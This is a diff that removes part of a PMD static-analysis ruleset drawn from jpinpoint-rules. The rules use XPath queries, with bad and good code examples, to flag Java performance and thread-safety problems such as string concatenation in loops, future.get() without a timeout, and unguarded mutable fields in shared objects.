-        <properties>
-            <property name="ruleIdMatches" type="String" value=".*"
-                      description="Regex for inclusion of rules"/>
-            <property name="ruleIdNotMatches" type="String" value="^$"
-                      description="Regex for exclusion of rules"/>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//Annotation//Name[@Image="SuppressWarnings" or @Image="SuppressFBWarnings"]/..//Literal[(matches(@Image, $ruleIdMatches)) and not (matches(@Image, $ruleIdNotMatches))]
-			]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="UsingSuppressWarningsHighRisk" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Using SuppressWarnings for a rule that is meant to prevent high risk problems." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance">
-        <description>(Informative) Problem: This rule detects high risk problems, suppressing them without full knowledge can lead to incidents like customer data mix-up, corrupt data, server crashes or very bad performance. &#13;
-            Solution: Suppress warnings judiciously based on full knowledge and report reasons to suppress (false positives) to the rule maintainers so these can be fixed. (jpinpoint-rules)</description>
-        <priority>4</priority>
-        <properties>
-            <property name="ruleIdMatches" type="String" value="AvoidUnguardedMutableFieldsInSharedObjects|AvoidUnguardedAssignmentToNonFinalFieldsInSharedObjects|AvoidMutableStaticFields|[^\w]ALL[^\w]|[^\w]all[^\w]|PMD[^\.]|pmd[^:]"
-                      description="Regex for inclusion of high risk rules"/>
-            <property name="ruleIdNotMatches" type="String" value="^$"
-                      description="Regex for exclusion of high risk rules"/>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//Annotation//Name[@Image="SuppressWarnings" or @Image="SuppressFBWarnings"]/..//Literal[(matches(@Image, $ruleIdMatches)) and not (matches(@Image, $ruleIdNotMatches))]
-			]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-<!-- END Included file 'common.xml' -->
-<!-- BEGIN Included file 'common_std.xml' -->
-    <rule name="AvoidApacheCommonsFileItemNonStreaming"
-          language="java"
-          message="Avoid memory intensive FileItem.get and FileItem.getString"
-          class="net.sourceforge.pmd.lang.rule.XPathRule"
-          typeResolution="true"
-          externalInfoUrl="${pmd.website.baseurl}/pmd_rules_performance.html#AvoidApacheCommonsFileItemNonStreaming">
-        <description>
-            Problem: Use of FileItem.get and FileItem.getString could exhaust memory since they load the entire file into memory&#13;
-            Solution: Use streaming methods and buffering.
-        (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//PrimaryPrefix/Name
-[ends-with(@Image, '.get') or ends-with(@Image, '.getString')]
-[
-	starts-with(@Image, concat(
-		ancestor::MethodDeclaration//FormalParameter/Type/ReferenceType/ClassOrInterfaceType[typeIs('org.apache.commons.fileupload.FileItem')]/../../..//VariableDeclaratorId/@Image,
-		'.')
-	) or
-	starts-with(@Image, concat(
-		ancestor::MethodDeclaration//LocalVariableDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('org.apache.commons.fileupload.FileItem')]/../../..//VariableDeclaratorId/@Image,
-		'.')
-	) or
-	starts-with(@Image, concat(
-		ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('org.apache.commons.fileupload.FileItem')]/../../..//VariableDeclaratorId/@Image,
-		'.')
-)
-]
-]]>
-                </value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-public class FileStuff {
-   private String bad(FileItem fileItem) {
-        return fileItem.getString();
-   }
-
-   private InputStream good(FileItem fileItem) {
-        return fileItem.getInputStream();
-   }
-}
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidCalendarDateCreation"
-          language="java"
-          message="A Calendar is used to create a Date or DateTime, this is expensive."
-          class="net.sourceforge.pmd.lang.rule.XPathRule"
-          typeResolution="true"
-          externalInfoUrl="${pmd.website.baseurl}/pmd_rules_performance.html#AvoidCalendarDateCreation">
-        <description>Problem: A Calendar is a heavyweight object and expensive to create. &#13;
-            Solution: Use 'new Date()', Java 8+ java.time.[Local/Zoned]DateTime.now() or joda time '[Local]DateTime.now()'.
-        (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//PrimaryPrefix[Name[ends-with(@Image, 'Calendar.getInstance')]] [count(../PrimarySuffix) > 2 and ../PrimarySuffix[last()-1][@Image = 'getTime' or @Image='getTimeInMillis']]
-|
-//Block/BlockStatement//Expression/PrimaryExpression/
-PrimaryPrefix/Name[typeIs('java.util.Calendar') and (ends-with(@Image,'.getTime') or ends-with(@Image,'.getTimeInMillis'))]
-|
-//ClassOrInterfaceType[typeIs('org.joda.time.DateTime') or typeIs('org.joda.time.LocalDateTime')][../Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, 'Calendar.getInstance')]]
-	         ]]></value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-public class DateStuff {
-    private Date bad1() {
-        return Calendar.getInstance().getTime(); // now
-    }
-    private Date good1a() {
-        return new Date(); // now
-    }
-    private LocalDateTime good1b() {
-        return LocalDateTime.now();
-    }
-    private long bad2() {
-        return Calendar.getInstance().getTimeInMillis();
-    }
-    private long good2() {
-        return System.currentTimeMillis();
-    }
-}
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidConcatInAppend"
-          language="java"
-          message="Concatenation inside append. Use extra append."
-          class="net.sourceforge.pmd.lang.rule.XPathRule"
-          typeResolution="true"
-          externalInfoUrl="${pmd.website.baseurl}/pmd_rules_performance.html#AvoidConcatInAppend">
-        <description>Concatenation of Strings is used inside an StringBuilder.append argument. Problem: Each statement with one or more +-operators creates a hidden temporary StringBuilder, a char[] and a new String object, which all have to be garbage collected.&#13;
-            Solution: Use an extra fluent append instead of concatenation.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//MethodDeclaration/Block/BlockStatement[
-(.//PrimaryExpression/PrimaryPrefix/Name[substring-after(@Image, '.') = 'append']
-or
-.//PrimaryExpression/PrimarySuffix/@Image = 'append')
-and
-.//PrimaryExpression/PrimarySuffix/Arguments/ArgumentList/Expression[1]/AdditiveExpression[@Image='+'
-and (count(PrimaryExpression/PrimaryPrefix/Name) > 0)
-and not(PrimaryExpression/PrimaryPrefix/Name/@Image=
-ancestor::ClassOrInterfaceBody//FieldDeclaration[@Final='true']//VariableDeclaratorId/@Image)
-and not(PrimaryExpression/PrimaryPrefix/Name/@Image=
-ancestor::Block//LocalVariableDeclaration[@Final='true']//VariableDeclaratorId/@Image)
-]]
-	]]></value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-public class StringStuff {
-   private String bad(String arg) {
-        StringBuilder sb = new StringBuilder();
-        sb.append("arg='" + arg + "'");
-        return sb.toString();
-   }
-
-   private String good(String arg) {
-        StringBuilder sb = new StringBuilder();
-        sb.append("arg='").append(arg).append("'");
-        return sb.toString();
-   }
-}
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidConcatInLoop"
-          language="java"
-          message="A String is concatenated in a loop. Use StringBuilder.append."
-          class="net.sourceforge.pmd.lang.rule.XPathRule"
-          typeResolution="true"
-          externalInfoUrl="${pmd.website.baseurl}/pmd_rules_performance.html#AvoidConcatInLoop">
-        <description>A String is built in a loop by concatenation. Problem: Each statement with one or more +-operators creates a hidden temporary StringBuilder, a char[] and a new String object, which all have to be garbage collected. &#13;
-            Solution: Use the StringBuilder append method.
-        (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-(//ForStatement | //WhileStatement | //DoStatement)//AssignmentOperator[
-    (: a += ...;  -- a being a string :)
-    @Image='+=' and preceding-sibling::*[1]/PrimaryPrefix/Name[pmd-java:typeIs('java.lang.String')]
-
-    (: a = ... + a + ...; -- a being a string :)
-    or @Image='=' and following-sibling::*[1]/AdditiveExpression/PrimaryExpression/PrimaryPrefix/Name[
-        pmd-java:typeIs('java.lang.String')
-        and @Image = ancestor::StatementExpression/PrimaryExpression/PrimaryPrefix/Name/@Image
-    ]
-]/.. (: Go up to report on the StatementExpression :)
-	]]>
-                </value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-public class StringStuff {
-   private String bad(String arg) {
-        String log = "";
-        List<String> values = Arrays.asList("tic ", "tac ", "toe ");
-        for (String val : values) {
-            log += val;
-        }
-        return log;
-    }
-
-   private String good(String arg) {
-        StringBuilder sb = new StringBuilder();
-        List<String> values = Arrays.asList("tic ", "tac ", "toe ");
-        for (String val : values) {
-            sb.append(val);
-        }
-        return sb.toString();
-   }
-}
-            ]]>
-        </example>
-    </rule>
-
-<!-- END Included file 'common_std.xml' -->
-<!-- BEGIN Included file 'concurrent.xml' -->
-    <rule name="AvoidCompletionServiceTake"
-          message="Avoid completionService.take, use poll"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance">
-        <description>
-            Problem: take() stalls indefinitely in case of hanging threads and consumes a thread.&#13;
-            Solution: use poll() with a timeout value and handle the timeout.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-  //MethodDeclaration//PrimaryPrefix/Name[ends-with(@Image, '.take')]
-    [(starts-with(@Image, concat(ancestor::MethodDeclaration//FormalParameter/Type/ReferenceType/ClassOrInterfaceType[
-    typeIs('java.util.concurrent.CompletionService')
-    or typeIs('java.util.concurrent.ExecutorCompletionService')
-    ]/../../../VariableDeclaratorId/@Image, '.'))
-    or
-    starts-with(@Image, concat(ancestor::MethodDeclaration//LocalVariableDeclaration/Type/ReferenceType/ClassOrInterfaceType[
-     typeIs('java.util.concurrent.CompletionService')
-    or typeIs('java.util.concurrent.ExecutorCompletionService')
-    ]/../../../VariableDeclarator/VariableDeclaratorId/@Image, '.'))
-    or
-    starts-with(@Image, concat(ancestor::ClassOrInterfaceBody//FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[
-     typeIs('java.util.concurrent.CompletionService')
-    or typeIs('java.util.concurrent.ExecutorCompletionService')
-    ]/../../../VariableDeclarator/VariableDeclaratorId/@Image, '.')))
-]    ]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidFutureGetWithoutTimeout"
-          message="Avoid future.get without timeout"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance">
-        <description>
-            Problem: Stalls indefinitely in case of hanging threads and consumes a thread.&#13;
-            Solution: Provide a timeout value and handle the timeout.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-   //MethodDeclaration//PrimaryPrefix/Name[ends-with(@Image, '.get')]
-    (: future.get or variant called on formal param :)
-    [(exists(index-of((ancestor::MethodDeclaration//FormalParameter[
-    pmd-java:typeIs('java.util.concurrent.Future')
-    or pmd-java:typeIs('java.util.concurrent.CompletableFuture')
-    or pmd-java:typeIs('java.util.concurrent.Response')
-    or pmd-java:typeIs('java.util.concurrent.RunnableFuture')
-    or pmd-java:typeIs('java.util.concurrent.RunnableScheduledFuture')
-    or pmd-java:typeIs('java.util.concurrent.ScheduledFuture')
-    ]/VariableDeclaratorId/@Image), substring-before(@Image,'.')))
-    or
-    (: future.get or variant called on local var :)
-    exists(index-of((ancestor::MethodDeclaration//LocalVariableDeclaration/Type[
-    pmd-java:typeIs('java.util.concurrent.Future')
-    or pmd-java:typeIs('java.util.concurrent.CompletableFuture')
-    or pmd-java:typeIs('java.util.concurrent.Response')
-    or pmd-java:typeIs('java.util.concurrent.RunnableFuture')
-    or pmd-java:typeIs('java.util.concurrent.RunnableScheduledFuture')
-    or pmd-java:typeIs('java.util.concurrent.ScheduledFuture')
-    ]/../VariableDeclarator/VariableDeclaratorId/@Image), substring-before(@Image,'.')))
-    or
-    (: future.get or variant called on field :)
-    exists(index-of((ancestor::ClassOrInterfaceBody//FieldDeclaration[
-    pmd-java:typeIs('java.util.concurrent.Future')
-    or pmd-java:typeIs('java.util.concurrent.CompletableFuture')
-    or pmd-java:typeIs('java.util.concurrent.Response')
-    or pmd-java:typeIs('java.util.concurrent.RunnableFuture')
-    or pmd-java:typeIs('java.util.concurrent.RunnableScheduledFuture')
-    or pmd-java:typeIs('java.util.concurrent.ScheduledFuture')
-    ]/VariableDeclarator/VariableDeclaratorId/@Image), substring-before(@Image,'.')))
-    )
-    (: .get without arguments :)
-    and not(../../PrimarySuffix/Arguments/ArgumentList)
-    ]
-]]>
-                </value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-    public static String bad(CompletableFuture<String> complFuture) throws Exception {
-            return complFuture.get(); // bad
-    }
-
-    public static String good(CompletableFuture<String> complFuture) throws Exception {
-            return complFuture.get(10, TimeUnit.SECONDS); // good
-    }
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidMutableStaticFields"
-          message="Avoid non-final or mutable static fields. Make final immutable or access thread-safely and use @GuardedBy."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC08">
-        <description>
-            Problem: Multiple threads typically access static fields. Unguarded assignment to a mutable or non-final static field is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention. &#13;
-            Solution: Make the fields final and unmodifiable.  If they really need to be mutable, make access thread-safe: use synchronized and @GuardedBy or use volatile. Consider lock contention.&#13;
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-(: static field, non-final, non-volatile, non-guarded by :)
-//ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration
-[@Static=true() and @Final=false() and @Volatile=false() and not (../Annotation//Name[@Image='GuardedBy'])]
-,
-(: static field, non-guarded, some often used known mutable types, declaration side :)
-(//ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static=true()]/Type/ReferenceType/ClassOrInterfaceType[
-(((pmd-java:typeIs('java.util.Date') or pmd-java:typeIs('java.lang.StringBuilder') or pmd-java:typeIs('java.lang.StringBuffer') or pmd-java:typeIs('java.net.URL')) or pmd-java:typeIs('java.io.File'))
- or (ancestor::FieldDeclaration/VariableDeclarator/VariableInitializer[ArrayInitializer and count(ArrayInitializer/VariableInitializer) > 0]))
- and not (ancestor::ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='GuardedBy'])
-])
-,
-(: static field, non-guarded, some often used known collection/array types, allocation side:)
-(//ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static=true() and not (../Annotation//Name[@Image='GuardedBy'])]/
-VariableDeclarator/VariableInitializer[((ArrayInitializer and count(ArrayInitializer/VariableInitializer) > 0)
-or Expression/PrimaryExpression/PrimaryPrefix/AllocationExpression[ArrayDimsAndInits and xs:int(ArrayDimsAndInits and (xs:int(ArrayDimsAndInits/Expression//Literal/@Image) > 0 or ArrayDimsAndInits/Expression//Name))]
-or Expression/PrimaryExpression/PrimaryPrefix/AllocationExpression[(pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet'))]
-or Expression/PrimaryExpression/PrimaryPrefix/Name[@Image='Arrays.asList']
-)])
-,
-(: static-block allocations of non-empty arrays :)
-//Initializer//AllocationExpression[((ArrayDimsAndInits and ((xs:int(ArrayDimsAndInits/Expression//Literal/@Image) > 0) or exists(ArrayDimsAndInits/Expression//Name) or exists(ArrayDimsAndInits/ArrayInitializer//Expression)))
-or
-(: static-block allocations of known mutable types :)
-ClassOrInterfaceType[pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet')])
-and
-(: given the field is not @GuardedBy :)
-ancestor::StatementExpression/PrimaryExpression/PrimaryPrefix/Name/@Image = ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration[count(Annotation//Name[@Image='GuardedBy']) = 0]/FieldDeclaration//VariableDeclaratorId/@Image
-]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidThreadUnsafeJaxbUsage" message="A JAXB Marshaller, Unmarshaller or Validator is used in a thread-unsafe way." class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IUOXAR07">
-        <description>Problem: JAXB Marshaller, Unmarshaller and Validator are not thread-safe.  &#13;
-            Solution: Create a new instance every time you need to marshall, unmarshall or validate a document.
-            (jpinpoint-rules)</description>
-        <priority>1</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.bind.Marshaller')]
-|
-//FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.bind.Unmarshaller')]
-|
-//FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.bind.Validator')]
-|
-//FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.validation.Validator')]
-			]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidUnguardedAssignmentToNonFinalFieldsInObjectsUsingSynchronized"
-          message="Avoid unguarded assignments to non-final fields in objects using synchronized. Access thread-safely and use @GuardedBy."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC07">
-        <description>
-            Problem: Multiple threads typically access fields of an object using synchronized. Unguarded assignment to a non-final field is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention. &#13;
-            Solution: Make the fields final and unmodifiable.  If they really need to be mutable, make access thread-safe: use synchronized and jcip @GuardedBy or use volatile.&#13;
-            Notes&#13;
-            1. In case you are sure the class is used in single threaded context only, remove current use of synchronized and annotate the class with @NotThreadSafe to make this explicit. &#13;
-            2. Use package-private and @VisibleForTesting for methods (e.g. setters) used for JUnit only.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-(: if @NotThreadSafe no checking :)
-//TypeDeclaration[count(Annotation/MarkerAnnotation/Name[@Image='NotThreadSafe'])=0]
-(: non-static classes using synchronized :)
-//ClassOrInterfaceDeclaration[@Static=false()]/ClassOrInterfaceBody[//SynchronizedStatement or //MethodDeclaration[@Synchronized=true()]]
-(: assignment to a field :)
-/ClassOrInterfaceBodyDeclaration/MethodDeclaration/Block/BlockStatement/Statement//StatementExpression/AssignmentOperator/../PrimaryExpression//*[@Image=
-(: non-final, non-volatile, non-GuardedBy fields :)
-ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Final=false() and @Volatile=false() and not (../Annotation//Name[@Image='GuardedBy'])]/VariableDeclarator/VariableDeclaratorId/@Image
-(: field not on accessor method with assignment, annotated with framework annotation :)
-and not (ancestor::ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='Autowired' or @Image='PostConstruct' or @Image='BeforeStep' or @Image='Value' or @Image='Inject']
-(: field not assigned in non-public accessor method annotated with VisibleForTesting :)
-or (ancestor::ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='VisibleForTesting'] and ancestor::MethodDeclaration[@Public=false()]))]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidUnguardedAssignmentToNonFinalFieldsInSharedObjects"
-          message="Avoid unguarded assignments to non-final fields in objects shared among threads. Access thread-safely and use @GuardedBy."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC07">
-        <description>
-            Problem: Multiple threads typically access fields of a singleton or may access fields in session scoped objects. Unguarded assignment to a non-final field is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention. &#13;
-            Solution: Make the fields final and unmodifiable.  If they really need to be mutable, make access thread-safe: use synchronized and jcip @GuardedBy or use volatile.&#13;
-            Notes&#13;
-            1. Autowiring/injection is thread safe, yet make sure no other thread-unsafe assignment is made to that field.&#13;
-            2. In case you are sure the Component is used in single threaded context only (e.g. a Tasklet), annotate the class with @NotThreadSafe to make this explicit. &#13;
-            3. Use package-private and @VisibleForTesting for methods (e.g. setters) used for JUnit only.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//TypeDeclaration/Annotation//Name[(@Image='Component' or @Image='Service' or @Image='Controller' or @Image='Repository' or
-(@Image='Singleton' and ancestor::TypeDeclaration/Annotation/NormalAnnotation/MemberValuePairs//Name[@Image='ConcurrencyManagementType.BEAN']))
-and not (ancestor::TypeDeclaration/Annotation//Name[@Image='Scope']/..//Literal[@Image='"request"' or @Image='"prototype"'])
-and not (ancestor::TypeDeclaration/Annotation//Name[@Image='RequestScope'])
-(: if @NotThreadSafe no checking :)
-and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='NotThreadSafe'])
-(: no checking if @ConfigurationProperties and no @Setter :)
-and not ((ancestor::TypeDeclaration/Annotation//Name[@Image='ConfigurationProperties'])
-         and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='Setter']))]
-(: assignment to a field :)
-/../../..//ClassOrInterfaceDeclaration[@Static=false()]/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration/Block/BlockStatement/Statement//StatementExpression/AssignmentOperator/../PrimaryExpression//*[@Image=
-(: non-final, non-volatile, non-GuardedBy fields :)
-ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Final=false() and @Volatile=false() and not (../Annotation//Name[@Image='GuardedBy'])]/VariableDeclarator/VariableDeclaratorId/@Image
-(: field not on accessor method with assignment, annotated with framework annotation :)
-and not (ancestor::ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='Autowired' or @Image='PostConstruct' or @Image='BeforeStep' or @Image='Value' or @Image='Inject']
-(: field not assigned in non-public accessor method annotated with VisibleForTesting :)
-or (ancestor::ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='VisibleForTesting'] and ancestor::MethodDeclaration[@Public=false()]))]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidUnguardedMutableFieldsInObjectsUsingSynchronized"
-          message="Avoid unguarded non-final or mutable fields in objects using synchronized. Make final immutable or access thread-safely and use @GuardedBy."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC07">
-        <description>
-            Problem: Multiple threads typically access fields of an object using synchronized. If a field or its reference is mutable, access is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention.&#13;
-            Solution: Make the fields final and unmodifiable. If they really need to be mutable, make access thread-safe: use synchronized and jcip @GuardedBy or use volatile.&#13;
-            Notes&#13;
-            1. Instances of Date, StringBuilder, URL and File are examples of mutable objects and should be avoided (or else guarded) as fields of shared objects. In case mutable fields are final and not modified after initialization (read-only) they are thread safe, however any modification to it is thread-unsafe. Since field modification is easily coded, avoid this situation.
-            &#13;2. Instances of classes like ArrayList, HashMap and HashSet are also mutable and should be properly wrapped with e.g. Collections.unmodifiableList after initialization (see TUTC03), or accessed thread-safely with e.g. Collections.synchronizedList or thread-safe implementations like ConcurrentHashMap.
-            &#13;3. Autowiring/injection is thread safe, yet make sure no other thread-unsafe assignment is made to that field.
-            &#13;4. In case you are sure the class is used in single threaded context only, annotate the class with @NotThreadSafe to make this explicit.
-            &#13;5. Use package private and @VisibleForTesting for methods used for JUnit only.
-            (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-(: if @NotThreadSafe no checking :)
-//TypeDeclaration[count(Annotation/MarkerAnnotation/Name[@Image='NotThreadSafe'])=0]
-(: non-static classes using synchronized :)
-//ClassOrInterfaceDeclaration[@Static=false()]/ClassOrInterfaceBody[//SynchronizedStatement or //MethodDeclaration[@Synchronized=true()]]
-(: non-final and non-volatile fields :)
-/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Final=false() and @Volatile=false()
-(: field not annotated with framework annotation or GuardedBy :)
-and not (../Annotation//Name[@Image='Autowired' or @Image='PersistenceContext' or @Image='EJB' or @Image='Resource' or @Image='Inject' or @Image='Value' or @Image='GuardedBy'])
-(: field not on accessor method with assignment, annotated with framework annotation :)
-and not (../../ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='Autowired' or @Image='PostConstruct' or @Image='BeforeStep' or @Image='Value' or @Image='Inject']
-/../../..//BlockStatement/Statement//StatementExpression/AssignmentOperator/../PrimaryExpression//@Image=
-./VariableDeclarator/VariableDeclaratorId/@Image)
-(: or field of known mutable types including array :)
-or ((Type/ReferenceType/ClassOrInterfaceType[(pmd-java:typeIs('java.util.Date') or pmd-java:typeIs('java.lang.StringBuilder') or pmd-java:typeIs('java.lang.StringBuffer') or pmd-java:typeIs('java.net.URL') or pmd-java:typeIs('java.io.File')) or
-(ancestor::FieldDeclaration/VariableDeclarator/VariableInitializer[ArrayInitializer and count(ArrayInitializer/VariableInitializer) > 0])])
-(: or in-line allocation of known mutable collection types :)
-or (VariableDeclarator/VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/AllocationExpression/ClassOrInterfaceType[pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet')] )
-(: or in-constructor allocation of known mutable collection types :)
-or (VariableDeclarator/VariableDeclaratorId/@Image = ancestor::ClassOrInterfaceBody//ConstructorDeclaration//StatementExpression/Expression[pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet')]/../..//Name/@Image)
-(: mutable types not annotated with GuardedBy :)
-) and not (../Annotation//Name[@Image='GuardedBy'])
-]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidUnguardedMutableFieldsInSharedObjects"
-          message="Avoid unguarded non-final or mutable fields in objects shared among threads. Make final immutable or access thread-safely and use @GuardedBy."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC07">
-        <description>
-            Problem: Multiple threads typically access fields of a singleton or may access fields in session scoped objects. If a field or its reference is mutable, access is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention.&#13;
-            Solution: Make the fields final and unmodifiable. If they really need to be mutable, make access thread-safe: use synchronized and jcip @GuardedBy or use volatile.&#13;
-            Notes&#13;
-            1. Instances of Date, StringBuilder, URL and File are examples of mutable objects and should be avoided (or else guarded) as fields of shared objects. In case mutable fields are final and not modified after initialization (read-only) they are thread safe, however any modification to it is thread-unsafe. Since field modification is easily coded, avoid this situation.
-            &#13;2. Instances of classes like ArrayList, HashMap and HashSet are also mutable and should be properly wrapped with e.g. Collections.unmodifiableList after initialization (see TUTC03), or accessed thread-safely with e.g. Collections.synchronizedList or thread-safe implementations like ConcurrentHashMap.
-            &#13;3. Autowiring/injection is thread safe, yet make sure no other thread-unsafe assignment is made to that field.
-            &#13;4. In case you are sure the Component is used in single threaded context only (e.g. a Tasklet), annotate the class with @NotThreadSafe to make this explicit.
-            &#13;5. Use package private and @VisibleForTesting for methods used for JUnit only.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-(: known assumed singleton types by annotation :)
-//TypeDeclaration/Annotation//Name[(@Image='Component' or @Image='Service' or @Image='Controller' or @Image='Repository' or
-(@Image='Singleton' and ancestor::TypeDeclaration/Annotation/NormalAnnotation/MemberValuePairs//Name[@Image='ConcurrencyManagementType.BEAN']))
-(: not shared when request or prototype scope :)
-and not (ancestor::TypeDeclaration/Annotation//Name[@Image='Scope']/..//Literal[@Image='"request"' or @Image='"prototype"'])
-and not (ancestor::TypeDeclaration/Annotation//Name[@Image='RequestScope'])
-(: if @NotThreadSafe no checking :)
-and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='NotThreadSafe'])
